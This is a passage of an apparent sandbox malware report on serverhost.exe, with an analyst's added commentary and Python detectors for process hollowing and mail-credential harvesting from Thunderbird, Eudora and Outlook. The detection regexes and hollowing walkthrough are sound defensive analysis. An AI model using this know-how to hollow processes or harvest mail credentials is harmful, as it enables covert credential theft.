Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird | | False | 1
Module (10)
Operation | Module | Additional Information | Success | Count
Load | comctl32.dll | base_address = 0x6eb50000 | True | 1
Load | shell32.dll | base_address = 0x758a0000 | True | 1
Load | pstorec.dll | base_address = 0x71ec0000 | True | 1
Get Handle | private_0x0000000000400000 | base_address = 0x400000 | True | 2
Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 | True | 2
Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = InitCommonControlsEx, address_out = 0x6eb56be6 | True | 1
Get Address | c:\windows\system32\shell32.dll | function = SHGetSpecialFolderPathA, address_out = 0x75aefb26 | True | 1
Get Address | c:\windows\system32\pstorec.dll | function = PStoreCreateInstance, address_out = 0x71ec526c | True | 1
System (1)
Operation | Additional Information | Success | Count
Get Info | type = Operating System | False | 1
Ini (7)
Operation | Filename | Additional Information | Success | Count
Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = ShowGridLines, default_value = 0 | True | 1
Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = SaveFilterIndex, default_value = 0 | True | 1
Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = AddExportHeaderLine, default_value = 0 | True | 1
Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = MarkOddEvenRows, default_value = 0 | True | 1
Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = WinPos | False | 1
Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = Columns | False | 1
Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = Sort, default_value = 0 | True | 1
Process #13: serverhost.exe
(Host: 54, Network: 0)
Information Value
ID #13
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:25, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:00
OS Process Information
Information Value
PID 0xc58
Parent PID 0xc18 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xC5C
0xC8C
0xC90
0xC94
0xC98
0xC9C
0xCA8
0xCAC
0xCB0
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
imm32.dll 0x00040000 0x0005cfff Memory Mapped File Readable False False False
private_0x0000000000040000 0x00040000 0x00040fff Private Memory Readable, Writable True False False
pagefile_0x0000000000050000 0x00050000 0x00051fff Pagefile Backed Memory Readable True False False
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False
locale.nls 0x00170000 0x001d6fff Memory Mapped File Readable False False False
pagefile_0x00000000001e0000 0x001e0000 0x002a7fff Pagefile Backed Memory Readable True False False
private_0x00000000002b0000 0x002b0000 0x002b0fff Private Memory Readable, Writable True False False
windowsshell.manifest 0x002c0000 0x002c0fff Memory Mapped File Readable False False False
pagefile_0x00000000002c0000 0x002c0000 0x002c1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False
private_0x00000000002e0000 0x002e0000 0x002e9fff Private Memory Readable, Writable, Executable True False False
private_0x00000000002f0000 0x002f0000 0x002fffff Private Memory True False False
private_0x0000000000300000 0x00300000 0x003fffff Private Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x00418fff Private Memory Readable, Writable, Executable True False False
private_0x0000000000420000 0x00420000 0x0060ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000420000 0x00420000 0x00520fff Pagefile Backed Memory Readable True False False
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False
rpcss.dll 0x00570000 0x005cbfff Memory Mapped File Readable False False False
private_0x0000000000570000 0x00570000 0x0058ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000570000 0x00570000 0x00572fff Pagefile Backed Memory Readable, Writable True False False
tzres.dll 0x00570000 0x00570fff Memory Mapped File Readable False False False
pagefile_0x0000000000570000 0x00570000 0x00570fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000580000 0x00580000 0x0058ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000590000 0x00590000 0x00591fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000005a0000 0x005a0000 0x005a0fff Private Memory Readable, Writable True False False
pagefile_0x00000000005b0000 0x005b0000 0x005b0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000005c0000 0x005c0000 0x005c1fff Pagefile Backed Memory Readable True False False
private_0x00000000005d0000 0x005d0000 0x005d0fff Private Memory Readable, Writable True False False
pagefile_0x00000000005e0000 0x005e0000 0x005e6fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005f0000 0x005f0000 0x005f1fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000600000 0x00600000 0x0060ffff Private Memory Readable, Writable True False False
private_0x0000000000610000 0x00610000 0x0070ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000610000 0x00610000 0x006eefff Pagefile Backed Memory Readable True False False
pagefile_0x00000000006f0000 0x006f0000 0x006f0fff Pagefile Backed Memory Readable True False False
private_0x0000000000700000 0x00700000 0x0070ffff Private Memory Readable, Writable True False False
sortdefault.nls 0x00710000 0x009defff Memory Mapped File Readable False False False
pagefile_0x00000000009e0000 0x009e0000 0x009e3fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000009f0000 0x009f0000 0x009f0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a00000 0x00a00000 0x00a00fff Pagefile Backed Memory Readable True False False
private_0x0000000000a50000 0x00a50000 0x00aeffff Private Memory Readable, Writable True False False
private_0x0000000000af0000 0x00af0000 0x00c2ffff Private Memory Readable, Writable True True False
private_0x0000000000af0000 0x00af0000 0x00b6ffff Private Memory Readable, Writable True False False
private_0x0000000000bf0000 0x00bf0000 0x00c2ffff Private Memory Readable, Writable True False False
serverhost.exemh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001860000 0x01860000 0x0205ffff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000020c0000 0x020c0000 0x021bffff Private Memory Readable, Writable True False False
private_0x00000000021c0000 0x021c0000 0x0226ffff Private Memory Readable, Writable True False False
private_0x0000000002280000 0x02280000 0x0237ffff Private Memory Readable, Writable True False False
private_0x0000000002460000 0x02460000 0x0255ffff Private Memory Readable, Writable True False False
pagefile_0x0000000002560000 0x02560000 0x02d5ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000002d60000 0x02d60000 0x02e60fff Private Memory Readable, Writable True False False
private_0x0000000002d60000 0x02d60000 0x02e5ffff Private Memory Readable, Writable True False False
private_0x0000000002ea0000 0x02ea0000 0x02f9ffff Private Memory Readable, Writable True False False
private_0x0000000002fa0000 0x02fa0000 0x0309ffff Private Memory Readable, Writable True False False
private_0x0000000003140000 0x03140000 0x0323ffff Private Memory Readable, Writable True False False
pagefile_0x0000000003240000 0x03240000 0x03632fff Pagefile Backed Memory Readable True False False
private_0x0000000003640000 0x03640000 0x0378ffff Private Memory Readable, Writable True False False
pagefile_0x0000000003640000 0x03640000 0x0373ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000003780000 0x03780000 0x0378ffff Private Memory Readable, Writable True False False
pagefile_0x0000000003790000 0x03790000 0x03f8ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000005290000 0x05290000 0x0538ffff Private Memory Readable, Writable True False False
private_0x0000000036890000 0x36890000 0x3689ffff Private Memory Readable, Writable, Executable True False False
olmapi32.dll 0x63430000 0x637fefff Memory Mapped File Readable, Writable, Executable False False False
osppc.dll 0x63b00000 0x63b2cfff Memory Mapped File Readable, Writable, Executable False False False
riched20.dll 0x63b30000 0x63cbdfff Memory Mapped File Readable, Writable, Executable False False False
adal.dll 0x63cc0000 0x63d74fff Memory Mapped File Readable, Writable, Executable False False False
msores.dll 0x64110000 0x68dfafff Memory Mapped File Readable, Writable, Executable False False False
mso.dll 0x68e00000 0x6a6e3fff Memory Mapped File Readable, Writable, Executable False False False
msointl.dll 0x6bdc0000 0x6c130fff Memory Mapped File Readable, Writable, Executable False False False
d2d1.dll 0x6c200000 0x6c2b9fff Memory Mapped File Readable, Writable, Executable False False False
mspst32.dll 0x6d080000 0x6d217fff Memory Mapped File Readable, Writable, Executable False False False
msadox.dll 0x6d1c0000 0x6d21afff Memory Mapped File Readable, Writable, Executable False False False
msadox.dll 0x6eaf0000 0x6eb4afff Memory Mapped File Readable, Writable, Executable False False False
contab32.dll 0x6f320000 0x6f342fff Memory Mapped File Readable, Writable, Executable False False False
mapir.dll 0x6f350000 0x6f483fff Memory Mapped File Readable, Writable, Executable False False False
davhlpr.dll 0x6f4f0000 0x6f4f7fff Memory Mapped File Readable, Writable, Executable False False False
davclnt.dll 0x6f500000 0x6f516fff Memory Mapped File Readable, Writable, Executable False False False
office.odf 0x70ac0000 0x70fbffff Memory Mapped File Readable, Writable, Executable False False False
msi.dll 0x70fc0000 0x711fffff Memory Mapped File Readable, Writable, Executable False False False
msvcp100.dll 0x71230000 0x71298fff Memory Mapped File Readable, Writable, Executable False False False
msvcr100.dll 0x712a0000 0x7135efff Memory Mapped File Readable, Writable, Executable False False False
dxgi.dll 0x716f0000 0x71772fff Memory Mapped File Readable, Writable, Executable False False False
webio.dll 0x719c0000 0x71a0efff Memory Mapped File Readable, Writable, Executable False False False
winhttp.dll 0x71a10000 0x71a67fff Memory Mapped File Readable, Writable, Executable False False False
msimg32.dll 0x71fc0000 0x71fc4fff Memory Mapped File Readable, Writable, Executable False False False
oleacc.dll 0x729b0000 0x729ebfff Memory Mapped File Readable, Writable, Executable False False False
dwmapi.dll 0x736e0000 0x736f2fff Memory Mapped File Readable, Writable, Executable False False False
gdiplus.dll 0x73840000 0x739cffff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74180000 0x7418cfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
powrprof.dll 0x74740000 0x74764fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74800000 0x74820fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x74940000 0x74948fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x75300000 0x75307fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
winsta.dll 0x753b0000 0x753d8fff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x753f0000 0x753fafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
wintrust.dll 0x754f0000 0x7551cfff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x766f0000 0x76772fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x77420000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd7000 0x7ffd7000 0x7ffd7fff Private Memory Readable, Writable True False False
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory Readable, Writable True False False
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory Readable, Writable True False False
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory Readable, Writable True False False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True False False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
Injection Information
Injection Type | Source Process | Source OS Thread ID | Injection Info | Success | Count
Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc30 | address = 0x400000, size = 102400 | True | 1
Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc30 | address = 0x7ffdd008, size = 4 | True | 1
Modify Control Flow | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc30 | os_tid = 0xc5c, address = 0x0 | True | 1
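The injection rows for process #12 and process #13 show the same three-step pattern from the same source process #11: a bulk write of a new image at 0x400000 (114688 bytes into #12, 102400 bytes into #13, so two different payloads), a single 4-byte write at PEB+0x8, which on 32-bit Windows is PEB.ImageBaseAddress, and a control-flow change on the child's initial thread (0xc54 and 0xc5c, the only or first thread listed for each child). The region tables corroborate it: in both children 0x00400000 is private readable/writable/executable memory rather than a mapped file, the on-disk serverhost.exe image sits at 0x00c40000, and in #12 GetModuleHandle resolves to private_0x0000000000400000 because the PEB now points there. That is process hollowing. The parser below is an added example, not VMRay code: it reads the rows in the report's own layout (the bracketed target header carrying the child's initial thread ID is my addition) and only reports hollowing when all three steps are present from one source; the PEB address band and offsets are 32-bit Windows 7 assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed excerpt in the layout of the report's "Injection Information"
# rows. The bracketed header naming the target process and its initial thread
# is my own addition; the report lists those in the process header instead.
SAMPLE = r"""
[target #12 main_tid 0xc54]
Modify Memory #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc20 address = 0x400000, size = 114688 True 1
Modify Memory #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc20 address = 0x7ffdf008, size = 4 True 1
Modify Control Flow #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc20 os_tid = 0xc54, address = 0x0 True 1
[target #13 main_tid 0xc5c]
Modify Memory #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc30 address = 0x400000, size = 102400 True 1
Modify Memory #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc30 address = 0x7ffdd008, size = 4 True 1
Modify Control Flow #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc30 os_tid = 0xc5c, address = 0x0 True 1
"""

HEADER = re.compile(r"^\[target (?P<target>#\d+) main_tid (?P<tid>0x[0-9a-f]+)\]$")
ROW = re.compile(
    r"^(?P<op>Modify Memory|Modify Control Flow) (?P<src>#\d+): (?P<image>.+?) "
    r"(?P<src_tid>0x[0-9a-f]+) (?P<info>.+?) (?P<ok>True|False) (?P<count>\d+)$"
)

# 32-bit Windows 7 layout assumptions: the PEB is a page in the band just below
# the 2 GB user-mode limit, and PEB+0x8 is ImageBaseAddress, a 4-byte pointer.
PEB_LOW, PEB_HIGH = 0x7FFD0000, 0x7FFF0000
PEB_IMAGE_BASE_OFFSET = 0x8
PTR_SIZE = 4
PAGE = 0x1000


@dataclass
class Event:
    op: str
    src: str
    src_tid: str
    kv: Dict[str, str]


def parse(text: str) -> Dict[str, dict]:
    """Group rows by target: {target: {"main_tid": ..., "events": [Event, ...]}}."""
    targets: Dict[str, dict] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        h = HEADER.match(line)
        if h:
            current = targets.setdefault(h["target"], {"main_tid": h["tid"].lower(), "events": []})
            continue
        m = ROW.match(line)
        if not m or current is None or m["ok"] != "True":
            continue  # skip failed calls and anything outside the row layout
        kv = dict(p.split(" = ", 1) for p in m["info"].split(", "))
        current["events"].append(Event(m["op"], m["src"], m["src_tid"].lower(), kv))
    return targets


def assess(main_tid: str, events: List[Event]) -> dict:
    """Look for the three-step hollowing signature among one target's events."""
    r = {"image_write": None, "peb_imagebase_patch": False, "main_thread_hijack": False,
         "single_source": len({e.src for e in events}) == 1}
    for e in events:
        if e.op == "Modify Memory":
            addr, size = int(e.kv["address"], 16), int(e.kv["size"])
            in_peb = PEB_LOW <= addr < PEB_HIGH and (addr & (PAGE - 1)) == PEB_IMAGE_BASE_OFFSET
            if size == PTR_SIZE and in_peb:
                r["peb_imagebase_patch"] = True          # ImageBaseAddress redirected
            elif size >= PAGE and addr % 0x10000 == 0:   # whole image dropped on an allocation boundary
                r["image_write"] = (addr, size)
        elif e.op == "Modify Control Flow" and e.kv.get("os_tid", "").lower() == main_tid:
            r["main_thread_hijack"] = True               # initial thread's context rewritten
    r["hollowing"] = (bool(r["image_write"]) and r["peb_imagebase_patch"]
                      and r["main_thread_hijack"] and r["single_source"])
    return r


def analyze(text: str) -> Dict[str, dict]:
    return {t: assess(d["main_tid"], d["events"]) for t, d in parse(text).items()}


if __name__ == "__main__":
    for target, verdict in analyze(SAMPLE).items():
        print(target, verdict)
```

Requiring all three steps keeps a lone remote write (a debugger, a hooking framework, an injected DLL) from tripping the rule; the differing image sizes for the two children are what tell an analyst that two distinct payloads were dropped, so both 0x400000 regions are worth dumping separately.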
Host Behavior
COM (1)
Operation | Class | Interface | Additional Information | Success | Count
Create | ED475410-B0D6-11D2-8C3B-00104B2A6676 | 9240A6CD-AF41-11D2-8C3B-00104B2A6676 | cls_context = CLSCTX_INPROC_SERVER | True | 1
File (6)
Operation | Filename | Additional Information | Success | Count
Create | C:\ProgramData\C572.tmp | desired_access = GENERIC_WRITE | True | 1
Open | STD_INPUT_HANDLE | | True | 1
Open | STD_OUTPUT_HANDLE | | True | 1
Open | STD_ERROR_HANDLE | | True | 1
Write | C:\ProgramData\C572.tmp | size = 58 | True | 1
Write | C:\ProgramData\C572.tmp | size = 54 | True | 1
Registry (3)
Operation | Key | Additional Information | Success | Count
Create Key | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | | True | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | value_name = DLLPathEx, data = 67 | True | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | value_name = MSIApplicationLCID, data = 77 | True | 1
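Taken together, processes #12 and #13 are copies of serverhost.exe spawned by serverhost.exe itself from a user-writable directory named after a real Windows folder, each running a hollowed-in payload. #12 is launched with a /scomma export switch pointing at a .tmp file under C:\ProgramData, probes Eudora registry keys and Thunderbird profile directories, and resolves PStoreCreateInstance from pstorec.dll (the legacy Protected Storage API); #13 is handed a second .tmp path, reads the Outlook mail-client registration and loads OLMAPI32.DLL, then writes 112 bytes into that file. That is consistent with credential or mail-account harvesting tooling driven from the hollowed children. The routine below is an added example, not VMRay code: it tags process-creation records (constructed here from the values in this report; #11's parent and command line are not shown in this section and are placeholders) with these indicators and combines them into a verdict. The regexes and the verdict rule are my assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    modules: List[str] = field(default_factory=list)   # DLLs loaded
    reg_keys: List[str] = field(default_factory=list)  # registry keys opened or read
    files: List[str] = field(default_factory=list)     # paths queried


DROPPED = r"c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe"

# Constructed records modelled on processes #11-#13 of the report. The parent
# and command line of #11 (PID 0xc18) are not shown in this section, so ppid=0
# and a bare-path command line are placeholders, not observed values.
PROCS = [
    Proc(0xC18, 0, DROPPED, f'"{DROPPED}"'),
    Proc(0xC50, 0xC18, DROPPED, f'"{DROPPED}" /scomma "C:\\ProgramData\\C570.tmp"',
         modules=["comctl32.dll", "shell32.dll", "pstorec.dll"],
         reg_keys=[r"HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine",
                   r"HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird"],
         files=[r"C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Thunderbird\Profiles"]),
    Proc(0xC58, 0xC18, DROPPED, f'"{DROPPED}" "C:\\ProgramData\\C572.tmp"',
         modules=["advapi32.dll", "ole32.dll", "shell32.dll", "OLMAPI32.DLL"],
         reg_keys=[r"HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook"]),
]

USER_WRITABLE = re.compile(r"\\(appdata\\(local|roaming)|programdata|temp)\\", re.I)
# A user-writable drop directory named after a real Windows folder.
FAKE_SYSTEM_DIR = re.compile(r"\\appdata\\local\\microsoft\\windows\\[^\\]+\.exe$", re.I)
CSV_EXPORT = re.compile(r'/scomma\s+"?[a-z]:\\programdata\\[^"\s]+\.tmp', re.I)
TMP_ARG = re.compile(r'"?[a-z]:\\programdata\\[^"\s]+\.tmp"?', re.I)
# Mail-client stores and the legacy Protected Storage API (pstorec.dll).
MAIL_HINTS = re.compile(r"eudora|thunderbird|mozilla|clients\\mail|outlook|olmapi32|pstorec", re.I)


def tag_process(p: Proc, by_pid: Dict[int, Proc]) -> List[str]:
    """Independent indicators for one process, in a fixed order."""
    tags = []
    parent = by_pid.get(p.ppid)
    if parent and parent.image.lower() == p.image.lower():
        tags.append("self_spawn")
    if USER_WRITABLE.search(p.image):
        tags.append("image_in_user_writable_dir")
    if FAKE_SYSTEM_DIR.search(p.image):
        tags.append("drop_dir_mimics_windows_folder")
    if CSV_EXPORT.search(p.cmdline):
        tags.append("csv_export_to_programdata_tmp")
    elif TMP_ARG.search(p.cmdline):
        tags.append("programdata_tmp_argument")
    if any(MAIL_HINTS.search(x) for x in p.modules + p.reg_keys + p.files):
        tags.append("mail_client_probe")
    return tags


def verdict(tags: List[str]) -> str:
    harvest_io = any(t in ("csv_export_to_programdata_tmp", "programdata_tmp_argument") for t in tags)
    if "self_spawn" in tags and "mail_client_probe" in tags and harvest_io:
        return "credential_harvest_candidate"
    return "review" if len(tags) >= 2 else "benign"


def analyze(procs: List[Proc]) -> Dict[int, dict]:
    by_pid = {p.pid: p for p in procs}
    out = {}
    for p in procs:
        tags = tag_process(p, by_pid)
        out[p.pid] = {"tags": tags, "verdict": verdict(tags)}
    return out


if __name__ == "__main__":
    for pid, res in analyze(PROCS).items():
        print(f"{pid:#x} {res['verdict']}: {', '.join(res['tags'])}")
```

The self-spawn check is what separates this from a user simply running a password-recovery utility: the harvesting copies are children of the dropped binary, the output lands in C:\ProgramData, and the mail-client probes happen without any interactive window. On a real endpoint the same correlation is possible from process-creation, image-load and registry telemetry keyed by PID.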
Module (40)
Operation | Module | Additional Information | Success | Count
Load | advapi32.dll | base_address = 0x764f0000 | True | 1
Load | ole32.dll | base_address = 0x77140000 | True | 1
Load | shell32.dll | base_address = 0x758a0000 | True | 1
Load | C:\PROGRA~1\MICROS~1\Office15\OLMAPI32.DLL | base_address = 0x63430000 | True | 1
Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76590000 | True | 1
Get Handle | mscoree.dll | | False | 1
Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x765e418d | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x765e1f61 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x765e1e16 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x765e76e6 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x765e3879 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x765924d8 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x765c2111 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x765d2510 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x765cb009 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x772c89be | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x772bc02a | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x772bc0d2 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x765c3f78 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x772c8bfb | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x772bb567 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x772e5998 | True | 1
